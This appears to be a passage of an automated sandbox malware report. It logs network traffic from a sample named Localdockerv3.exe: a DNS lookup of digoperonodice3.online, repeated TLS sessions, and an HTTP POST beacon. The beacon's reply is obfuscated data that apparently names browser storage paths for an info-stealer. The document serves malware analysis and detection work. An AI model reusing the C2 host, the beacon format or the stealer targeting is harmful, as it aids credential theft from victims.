                                                                                                      Dec 27, 2024 08:16:04.097177982 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:04.097254038 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:04.097317934 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:04.097738981 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:04.097754002 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.356442928 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.356519938 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.357762098 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.357775927 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.358004093 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.358979940 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.359885931 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.359921932 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360018015 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360053062 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360155106 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360179901 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360289097 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360320091 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360440969 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360470057 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360615969 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360641003 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360649109 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360652924 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360780954 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360802889 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.360826015 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360955954 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.360975981 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.407326937 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.407540083 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.407592058 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.407620907 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.451380014 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.451677084 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.451775074 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.451869965 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.495353937 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:05.495440960 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:05.539361000 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.403255939 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.403337002 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.403408051 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.403558016 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.403589964 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.403604984 CET49716443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.403610945 CET44349716172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.450630903 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.450683117 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:07.450762033 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.451070070 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:07.451086044 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:08.819494009 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:08.819571018 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:08.820776939 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:08.820782900 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:08.820975065 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:08.821791887 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:08.821821928 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:08.821825027 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:09.619201899 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:09.619272947 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:09.619471073 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:09.619733095 CET49717443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:09.619749069 CET44349717172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:09.628319025 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:09.628401995 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:09.628551960 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:09.628856897 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:09.628870010 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:10.841835022 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:10.842098951 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:10.843424082 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:10.843447924 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:10.843717098 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:10.844564915 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:10.844607115 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:10.844613075 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.458291054 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.458463907 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.458719015 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.458839893 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.458880901 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.458880901 CET49718443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.458903074 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.458935976 CET44349718172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.477114916 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.477173090 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:11.477252960 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.477551937 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:11.477565050 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:12.781722069 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:12.781810045 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:12.783092022 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:12.783102989 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:12.783351898 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:12.784162998 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:12.784188986 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:12.784193039 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.423371077 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.423446894 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.423490047 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.424290895 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.424307108 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.424324989 CET49719443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.424330950 CET44349719172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.490767956 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.490832090 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:13.490901947 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.491450071 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:13.491462946 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:14.704049110 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:14.704164982 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:14.706588984 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:14.706605911 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:14.706907034 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:14.707613945 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:14.707658052 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:14.707664967 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.311872959 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.312036037 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.312094927 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.315459967 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.315485001 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.315500975 CET49720443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.315514088 CET44349720172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.850256920 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.850367069 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:15.850459099 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.850723028 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:15.850745916 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.109630108 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.109797955 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.111320972 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.111342907 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.111641884 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.112526894 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.112658978 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.112689018 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.112791061 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.112822056 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:17.112946033 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:17.112987041 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.181848049 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.181925058 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.182049036 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.182188988 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.182219982 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.182238102 CET49721443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.182245970 CET44349721172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.224566936 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.224638939 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:18.224723101 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.225017071 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:18.225027084 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:19.577060938 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:19.577126980 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:19.579226017 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:19.579235077 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:19.579515934 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:19.580205917 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:19.580226898 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:19.580229998 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:20.199409008 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:20.199598074 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:20.199664116 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:20.199749947 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:20.199796915 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:20.199796915 CET49722443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:20.199820042 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:20.199841976 CET44349722172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:22.321963072 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:22.322097063 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:22.322206974 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:22.323144913 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:22.323180914 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:23.630182981 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:23.630280972 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:23.631505966 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:23.631520033 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:23.631912947 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:23.684098005 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:23.712938070 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:23.712960958 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:23.713201046 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:24.333190918 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:24.333268881 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:24.333340883 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:24.333425999 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:24.333455086 CET44349723172.67.153.243192.168.2.8
                                                                                                      Dec 27, 2024 08:16:24.333468914 CET49723443192.168.2.8172.67.153.243
                                                                                                      Dec 27, 2024 08:16:24.333475113 CET44349723172.67.153.243192.168.2.8
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 27, 2024 08:15:50.858737946 CET5539853192.168.2.81.1.1.1
                                                                                                      Dec 27, 2024 08:15:51.260879993 CET53553981.1.1.1192.168.2.8
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 27, 2024 08:15:50.858737946 CET192.168.2.81.1.1.10xef0fStandard query (0)digoperonodice3.onlineA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 27, 2024 08:15:51.260879993 CET1.1.1.1192.168.2.80xef0fNo error (0)digoperonodice3.online172.67.153.243A (IP address)IN (0x0001)false
                                                                                                      Dec 27, 2024 08:15:51.260879993 CET1.1.1.1192.168.2.80xef0fNo error (0)digoperonodice3.online104.21.12.244A (IP address)IN (0x0001)false
                                                                                                      • digoperonodice3.online
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.849711172.67.153.2434431296C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-27 07:15:52 UTC364OUTPOST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept: */*
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                      Content-Length: 96
                                                                                                      Host: digoperonodice3.online
                                                                                                      2024-12-27 07:15:52 UTC96OUTData Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 00 00 00 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                      Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                      2024-12-27 07:15:53 UTC883INHTTP/1.1 200 OK
                                                                                                      Date: Fri, 27 Dec 2024 07:15:53 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHvK1FedFBBkpVd40DWUBcgm7H6%2FRGSp1yy9%2BJPXeXIqiDkcz7Zfx%2BC63vvM%2BzbNR8CBt8apaeaUy1q5CjWvjQhARoLlkeCNbOyxB%2FgG%2BkQmCxA8SM7%2Fx3IDMLqxpsvyiyook8YrZiZ6"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f87859faa4b422d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=7897&min_rtt=2158&rtt_var=4427&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2856&recv_bytes=1096&delivery_rate=1353104&cwnd=232&unsent_bytes=0&cid=d0a198422cb3aaf8&ts=940&x=0"
                                                                                                      2024-12-27 07:15:53 UTC17INData Raw: 63 0d 0a 00 00 00 00 a8 bd 5c 27 d5 84 00 00 0d 0a
                                                                                                      Data Ascii: c\'
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 33 32 65 36 0d 0a 00 00 00 00 c2 05 f5 08 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 c2 05 a4 89 88 07 9e 44 f4 54 11 0b 26 06 14 00 23 00 b9 08 03 08 02 11 00 cb b9 27 11 0b a0 84 aa 1b 39 00 94 49 60 6d 77 67 6b 76 60 67 65 6a 65 76 7d 58 48 6b 67 65 68 24 57 70 6b 76 65 63 61 58 68 61 72 61 68 60 66 0e 0b 37 08 10 00 04 00 c7 04 03 08 02 11 00 eb c7 27 0e 0b aa f2 3e 7d 90 3f 42 2e 38 03 94 0e 14 00 07 00 b9 08 03 08 02 11 00 d8 b9 27 38 03 a0 84 aa 1b 39 00 94 49 47 51 56 56 41 4a 50 9a 08 ae 08 14 00 07 00 b9 08 03 08 02 11 00 a2 b9 27 9a 08 a0 84 aa 1b 39 00 94 49 45 6a 7d 40 61 77 6f 4f 0b 26 0d 14 00 23 00 b9 08 03 08 02 11 00 4a b9 27 4f 0b a0 84 aa 1b 39 00 94 49 57 6b 62 70 73 65 76 61 58 69 6b 6a 61 76 6b 29 74 76 6b 6e 61 67 70 58 69 6b 6a 61
                                                                                                      Data Ascii: 32e6^'DT&#'9I`mwgkv`gejev}XHkgeh$WpkvecaXharah`f7'>}?B.8'89IGQVVAJP'9IEj}@awoO&#J'O9IWkbpsevaXikjavk)tvknagpXikja
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 46 e1 79 38 7c 2c 05 6b 53 06 a4 0c 14 00 08 00 eb 08 03 08 02 11 00 02 eb 27 53 06 09 f5 74 ec 42 2e db 5f 92 26 42 6b 13 9a dd 07 10 05 cf 06 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 10 05 dc 9e dd dc e7 57 a1 8f bc 05 24 00 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 bc 05 1c b1 1e c8 26 7c 62 9b 2a 04 91 05 10 00 04 00 c7 04 03 08 02 11 00 cb c7 27 2a 04 92 19 2c 47 a3 d4 50 14 d7 07 df 0c 14 00 05 00 b9 08 03 08 02 11 00 d8 b9 27 d7 07 a0 84 aa 1b 39 00 94 49 2e 2a 68 60 66 59 0c a8 08 14 00 08 00 b9 08 03 08 02 11 00 da b9 27 59 0c a0 84 aa 1b 39 00 94 49 67 61 76 70 3d 2a 60 66 09 0d 03 0f 14 00 08 00 eb 08 03 08 02 11 00 0b eb 27 09 0d f7 0e c3 1a 92 a5 91 2d 69 dd f5 9d c3 11 97 75 a0 01 09 0b 10 00 04 00 c7 04 03 08 02 11 00 02 c7 27 a0 01 ee 08
                                                                                                      Data Ascii: Fy8|,kS'StB._&Bk'W$^'&|b*'*,GP'9I.*h`fY'Y9Igavp=*`f'-iu'
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 08 00 b9 08 03 08 02 11 00 d8 b9 27 8b 0b a0 84 aa 1b 39 00 94 49 74 76 6b 62 6d 68 61 77 21 04 ea 05 14 00 0c 00 b9 08 03 08 02 11 00 0b b9 27 21 04 a0 84 aa 1b 39 00 94 49 71 68 70 76 65 72 6a 67 2a 6d 6a 6d a7 09 13 03 14 00 0d 00 b9 08 03 08 02 11 00 4a b9 27 a7 09 a0 84 aa 1b 39 00 94 49 65 76 69 6b 76 7d 2e 73 65 68 68 61 70 4c 04 6d 0c 14 00 0c 00 b9 08 03 08 02 11 00 02 b9 27 4c 04 a0 84 aa 1b 39 00 94 49 73 65 70 61 76 62 6b 7c 2a 61 7c 61 df 01 3a 08 14 00 11 00 b9 08 03 08 02 11 00 d8 b9 27 df 01 a0 84 aa 1b 39 00 94 49 67 6c 76 6b 69 6d 71 69 5b 66 76 6b 73 77 61 76 77 70 08 df 03 14 00 08 00 eb 08 03 08 02 11 00 5e eb 27 70 08 68 e5 1d 04 85 f9 a9 54 f6 36 2b 83 d4 4d af 0c b3 06 c1 0a 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 b3 06 c5 8e 95
                                                                                                      Data Ascii: '9Itvkbmhaw!'!9Iqhpverjg*mjmJ'9Ievikv}.sehhapLm'L9Isepavbk|*a|a:'9Iglvkimqi[fvkswavwp^'phT6+M'
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 08 0b 9f 04 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 08 0b c9 bc 10 8e f3 71 6c dd 70 09 31 03 14 00 08 00 eb 08 03 08 02 11 00 cb eb 27 70 09 fc 82 54 a9 56 42 a8 67 73 51 62 2e 07 f6 ae 3f 2b 09 4e 00 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 2b 09 5c 29 10 4b 67 e4 6c 18 09 02 94 05 14 00 08 00 eb 08 03 08 02 11 00 5e eb 27 09 02 94 f0 da be 71 35 3d c4 08 23 ec 39 20 81 3b 9c b3 07 e3 09 10 00 04 00 c7 04 03 08 02 11 00 5e c7 27 b3 07 04 af 8b 0f 3e 62 f7 5c 19 0c 45 03 14 00 01 00 b9 08 03 08 02 11 00 4a b9 27 19 0c a0 84 aa 1b 39 00 94 49 2e dd 0c 3e 09 14 00 22 00 b9 08 03 08 02 11 00 cb b9 27 dd 0c a0 84 aa 1b 39 00 94 49 69 61 77 77 61 6a 63 61 76 77 58 40 6d 77 67 6b 76 60 58 40 61 72 61 68 6b 74 69 61 6a 70 58 6f 61 7d 25 07 28 0f 14 00 08 00
                                                                                                      Data Ascii: ^'qlp1'pTVBgsQb.?+NJ'+\)Kgl^'q5=#9 ;^'>b\EJ'9I.>"'9IiawwajcavwX@mwgkv`X@arahktiajpXoa}%(
                                                                                                      2024-12-27 07:15:53 UTC1369INData Raw: 00 b9 08 03 08 02 11 00 02 b9 27 e7 0a a0 84 aa 1b 39 00 94 49 31 3c 32 33 36 35 34 35 37 31 33 33 30 37 34 3c 3c 3d 30 cc 02 93 09 14 00 08 00 eb 08 03 08 02 11 00 d8 eb 27 cc 02 23 59 19 8d 67 6a 91 4b 8f 8a 2f 0a 36 de 97 13 b1 0a f4 01 14 00 08 00 b9 08 03 08 02 11 00 d8 b9 27 b1 0a a0 84 aa 1b 39 00 94 49 74 76 6b 62 6d 68 61 77 ec 04 74 01 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 ec 04 f7 34 e4 21 cd f9 98 72 a6 04 8b 03 14 00 08 00 b9 08 03 08 02 11 00 cb b9 27 a6 04 a0 84 aa 1b 39 00 94 49 77 61 70 70 6d 6a 63 77 cd 0e 7c 02 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 cd 0e 72 c5 41 9d e9 8e 3c ce 25 0c 32 07 10 00 04 00 c7 04 03 08 02 11 00 4a c7 27 25 0c d9 5e 7f 11 e2 72 f6 47 62 04 ee 0e 10 00 04 00 c7 04 03 08 02 11 00 0b c7 27 62 04 76 9c 46
                                                                                                      Data Ascii: '9I1<2365457133074<<=0'#YgjK/6'9ItvkbmhawtJ'4!r'9Iwappmjcw|'rA<%2J'%^rGb'bvF
